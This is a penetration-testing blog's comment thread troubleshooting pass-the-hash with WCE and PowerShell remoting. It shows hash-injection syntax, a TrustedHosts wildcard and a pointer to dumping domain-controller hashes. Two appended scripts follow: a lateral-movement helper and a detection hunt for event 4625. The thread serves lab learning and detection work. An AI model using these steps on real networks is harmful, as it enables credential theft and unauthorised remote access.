Comments on Lab of a Penetration Tester: Poshing the hashes: Using PowerShell to play with hashes
Blog author: Nikhil SamratAshok Mittal
(comment feed, 16 comments, oldest first; feed last updated 2023-10-02)

----------------------------------------------------------------------
2013-09-13 04:37 (+05:30), Tragedy:

Hi, Nikhil! Very cool stuff you have here.

I've tried replicating your implementation on Windows 8 (PowerShell 3.0), Windows 2008 R2 (PowerShell 2.0), and on a Windows 7 box running PowerShell 2.0.

I've had the best luck with Windows 7 but am running into an issue once I try to Enter-PSSession from the WCE-started PowerShell session: once I feed it the target machine I immediately get prompted with a credentials box. I can, of course, manually insert my username and password and then proceed to invoke commands on the target machine... but in your example, you were able to remotely connect with just the -ComputerName from the WCE shell.

Any thoughts on this? I poked around on MSDN and made sure that my account (whose hashed credentials I'm using) is an admin on the target box.

Thanks a bunch!
- Rob

----------------------------------------------------------------------
2013-09-13 11:35 (+05:30), Nikhil SamratAshok Mittal:

Hi Rob,

That is strange. I never faced such an issue. Even if you have no admin access on the remote machine it would say "Access Denied" or throw some error. I have not seen the WCE-started session asking for credentials. Are you sure you are not using the -Credential parameter with Enter-PSSession? Have you tried using Invoke-Command? Very unlikely, but this *may* happen if you are trying to connect from v3 to v2.

If the problem persists, give me more details and we will try to resolve it together.

Thanks

----------------------------------------------------------------------
2013-09-16 23:28 (+05:30), Anonymous:

Thanks for the quick response, Nikhil! I hope you had a great weekend.

I've tried running through the steps again and here's some additional information: I've successfully dumped the hash via WCE and used the -s and -c switches to fire up the new PowerShell console. My screen looks similar to your step-by-step screenshots; my PowerShell console shows the info for the new logon session using NTLM credentials...

I've used your script to see if I can connect to the target machine and everything is good. When I try Enter-PSSession with no -Credential switch, I get the following error: "Connecting to remote server failed with the following message: Logon failure: unknown user name or bad password."

It looks like there is some sort of issue with the new logon session using the LM hash and NT hash I got from WCE... Interesting!

Thanks again for your input and time, much appreciated!

----------------------------------------------------------------------
2013-09-16 23:48 (+05:30), Nikhil SamratAshok Mittal:

No problem.

Can you do one quick check? While using WCE, use the hash in this format:

    .\wce.exe -s Rob::LM:NT

unlike the screenshot in the above post, which shows:

    .\wce.exe -s Rob:.:LM:NT

----------------------------------------------------------------------
2013-09-17 01:29 (+05:30), Anonymous:

That's how I was using it: ROB:DOMAIN:LM:NT :)

No luck thus far... very strange!

----------------------------------------------------------------------
2013-09-17 10:28 (+05:30), Nikhil SamratAshok Mittal:

Ok, one more thing (and if it solves your problem then it's my fault for not mentioning it in the post). You have to trust the target by using this from an elevated PowerShell:

    Set-Item WSMan:\localhost\Client\TrustedHosts -Value

or, to trust all target computers:

    Set-Item WSMan:\localhost\Client\TrustedHosts -Value *

----------------------------------------------------------------------
2013-09-18 02:11 (+05:30), Anonymous:

Yup, you mentioned this in your article. I've added the value " * " and I've also tried it with the specific name of the target, and I was prompted with a [Y] or [N] to make sure I wanted to add the target machine.
But once I start the WCE session and try to Enter-PSSession I'm still getting the same login failure error.

Very interesting!

----------------------------------------------------------------------
2013-11-21 04:16 (+05:30), Bridgey the Geek:

Thank you so much for such interesting posts. I'm trying to follow along but I'm getting the most frustrating error when I try to use wce.exe. I have Googled high and low, but nobody seems to have the same problem as me:

    C:\tools\wce_v1_3beta>wce.exe
    WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
    Use -h for help.

    CrossSessionCreateRemoteThread: Cannot create new thread

I'm hoping you can shed some light on this error?! It happens no matter what options I pass to WCE. FYI, I am running the command from an Administrator's command prompt. Thank you.

----------------------------------------------------------------------
2013-11-21 10:02 (+05:30), Nikhil SamratAshok Mittal:

Thank you for reading my post!

Looks like you are running the 32-bit version of WCE on a 64-bit machine. Try using the 64-bit version (or the universal version). Please let me know if this solves your problem.

----------------------------------------------------------------------
2013-11-22 01:24 (+05:30), Bridgey the Geek:

Hey Nikhil, you were absolutely right. I downloaded the universal version and it works a treat. Thank you very much.

----------------------------------------------------------------------
2014-08-26 01:38 (+05:30), Anonymous:

Anyone tried this across non-domain-joined machines?
I'm interested in making this work on an Azure VM.

----------------------------------------------------------------------
2014-08-26 09:39 (+05:30), Nikhil SamratAshok Mittal:

It works fine with non-domain machines. You just need to trust the target machine. Use this on your (attacking) machine:

    Set-Item wsman:localhost\client\trustedhosts -Value

----------------------------------------------------------------------
2014-08-28 07:30 (+05:30), Anonymous:

My tests weren't successful, but the event log indicates that the right target user is trying to access, which is a start. I get the following event log entry:

    Logon Type: 3

    Account For Which Logon Failed:
      Security ID: NULL SID
      Account Name: user
      Account Domain: TARGET

    Failure Information:
      Failure Reason: Unknown user name or bad password.
      Status: 0xC000006D
      Sub Status: 0xC000006A

    Process Information:
      Caller Process ID: 0x0
      Caller Process Name: -

    Network Information:
      Workstation Name: ATTACKER
      Source Network Address: -
      Source Port: -

    Detailed Authentication Information:
      Logon Process: NtLmSsp
      Authentication Package: NTLM
      Transited Services: -
      Package Name (NTLM only): -
      Key Length: 0

----------------------------------------------------------------------
2014-08-29 12:28 (+05:30), Nikhil SamratAshok Mittal:

Are you using the built-in Administrator account? This could be because of KB2871997 and KB2928120.
See the update.

----------------------------------------------------------------------
2014-10-28 15:28 (+05:30), Anonymous:

Is there a way to dump hashes from a W2K12 DC with PowerShell?

----------------------------------------------------------------------
2014-10-28 18:24 (+05:30), Nikhil SamratAshok Mittal:

Have you tried Get-PassHashes? It should do the job.
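The TrustedHosts step that comes up repeatedly in the thread (trust the target on the attacking machine, then Enter-PSSession / Invoke-Command from the WCE-started session without -Credential) is easy to get half right: a plain -Value overwrites whatever was there, a wildcard is wider than a pentest usually needs, and a successful listener check proves nothing about the hash. The script below is an added example and is not code from the post, its author, or WCE; $Target is a hypothetical host name, and it assumes WinRM over HTTP (TCP 5985) is reachable and that the script is run from an elevated PowerShell inside the session that WCE started, so the implicit credential is the injected hash.

```powershell
# Added example, not from the original post or comments.
# Assumptions: run elevated, inside the WCE-started PowerShell, WinRM reachable.
param(
    [string]$Target = 'target-host'   # hypothetical; replace with the real host name
)

$path = 'WSMan:\localhost\Client\TrustedHosts'

# 1. Record the current value so it can be restored afterwards.
#    TrustedHosts is a client-side setting; it only disables the client's
#    check that the server could be mutually authenticated (no Kerberos here).
$before = [string](Get-Item $path).Value
"TrustedHosts before: '$before'"

# 2. Add only the target, and only once. -Concatenate appends to the existing
#    list; plain -Value would replace it. Skip if '*' or the host is present.
$entries = if ($before) { $before -split ',' | ForEach-Object { $_.Trim() } } else { @() }
if ($entries -notcontains '*' -and $entries -notcontains $Target) {
    Set-Item $path -Value $Target -Concatenate -Force
}
"TrustedHosts after:  '$((Get-Item $path).Value)'"

# 3. Check that the listener answers. Without -Authentication, Test-WSMan sends
#    an unauthenticated Identify request, so success here means WinRM is up,
#    nothing more; it says nothing about whether the injected hash is valid.
Test-WSMan -ComputerName $Target -ErrorAction Stop | Out-Null

# 4. Use the implicit logon session: no -Credential. Negotiate falls back to
#    NTLM when Kerberos is not available (non-domain target, or no ticket),
#    which is what a WCE-injected LM:NT pair can satisfy. A "Logon failure:
#    unknown user name or bad password" at this point means the hash or the
#    user:domain part of the -s string is wrong, not TrustedHosts.
$s = New-PSSession -ComputerName $Target -Authentication Negotiate -ErrorAction Stop
Invoke-Command -Session $s -ScriptBlock { whoami; hostname }
Remove-PSSession $s

# 5. Restore TrustedHosts exactly as it was.
Set-Item $path -Value $before -Force
```

Two things this makes visible that the one-liners in the thread do not: the prompt the commenter saw ("[Y] or [N]") is the confirmation that -Force suppresses, and the order of checks separates a transport problem (step 3 fails) from a credential problem (step 4 fails with the logon-failure message quoted above).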
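The 4625 event posted in the thread is worth reading from the defender's side as well: Logon Type 3 with Authentication Package NTLM, a NULL SID, Status 0xC000006D (STATUS_LOGON_FAILURE) and Sub Status 0xC000006A (STATUS_WRONG_PASSWORD) is exactly what a pass-the-hash attempt with a wrong or stale hash leaves on the target, and the Source Network Address is "-" because the WinRM/NTLM path does not always fill it in, so the Workstation Name is the field to pivot on. The following hunt is an added example, not part of the post or its author's tooling; it runs on the target (or on a collector holding its forwarded Security log), needs an elevated prompt to read that log, and the look-back window and threshold are arbitrary choices made for the example.

```powershell
# Added detection example, not from the original post or comments.
# Assumptions: elevated prompt; Security log readable; PowerShell 3.0 or later.
param(
    [int]$Hours     = 24,   # look-back window (arbitrary)
    [int]$Threshold = 3     # flag a workstation after this many bad-password failures on one account
)

# NTSTATUS sub-status values as they appear in 4625 EventData (lower-case hex).
$subStatusNames = @{
    '0xc000006a' = 'STATUS_WRONG_PASSWORD'      # the value in the posted event: hash did not match
    '0xc0000064' = 'STATUS_NO_SUCH_USER'        # account name unknown on the target
    '0xc0000234' = 'STATUS_ACCOUNT_LOCKED_OUT'
}

# Pre-filter inside the event log (cheap): 4625, network logon, NTLM package,
# within the window. timediff() is the event-log XPath helper, in milliseconds.
$windowMs = $Hours * 3600 * 1000
$xpath = "*[System[EventID=4625 and TimeCreated[timediff(@SystemTime) <= $windowMs]]" +
         " and EventData[Data[@Name='LogonType']='3' and Data[@Name='AuthenticationPackageName']='NTLM']]"

$events = Get-WinEvent -LogName Security -FilterXPath $xpath -ErrorAction SilentlyContinue

# Flatten each event's EventData into one object per failure.
$rows = foreach ($e in $events) {
    $x = [xml]$e.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    $sub = ([string]$d['SubStatus']).ToLower()
    [pscustomobject]@{
        Time        = $e.TimeCreated
        Account     = "$($d['TargetDomainName'])\$($d['TargetUserName'])"   # TARGET\user in the posted event
        Workstation = $d['WorkstationName']                                  # ATTACKER in the posted event
        SourceIP    = $d['IpAddress']                                        # '-' for WinRM/NTLM is common
        SubStatus   = $sub
        Reason      = if ($subStatusNames.ContainsKey($sub)) { $subStatusNames[$sub] } else { 'other' }
    }
}

# Keep only wrong-password failures, then group by source workstation and
# target account so repeated tries from one host stand out.
$rows | Where-Object { $_.SubStatus -eq '0xc000006a' } |
    Group-Object Workstation, Account |
    Where-Object { $_.Count -ge $Threshold } |
    ForEach-Object {
        [pscustomobject]@{
            Workstation = $_.Group[0].Workstation
            Account     = $_.Group[0].Account
            Failures    = $_.Count
            First       = ($_.Group | Measure-Object Time -Minimum).Minimum
            Last        = ($_.Group | Measure-Object Time -Maximum).Maximum
        }
    } | Format-Table -AutoSize
```

A successful pass-the-hash logon over the same path shows up as 4624 rather than 4625, again with Logon Type 3 and Authentication Package NTLM, so the same XPath with EventID=4624 and no sub-status filter is the companion query once the hash is right.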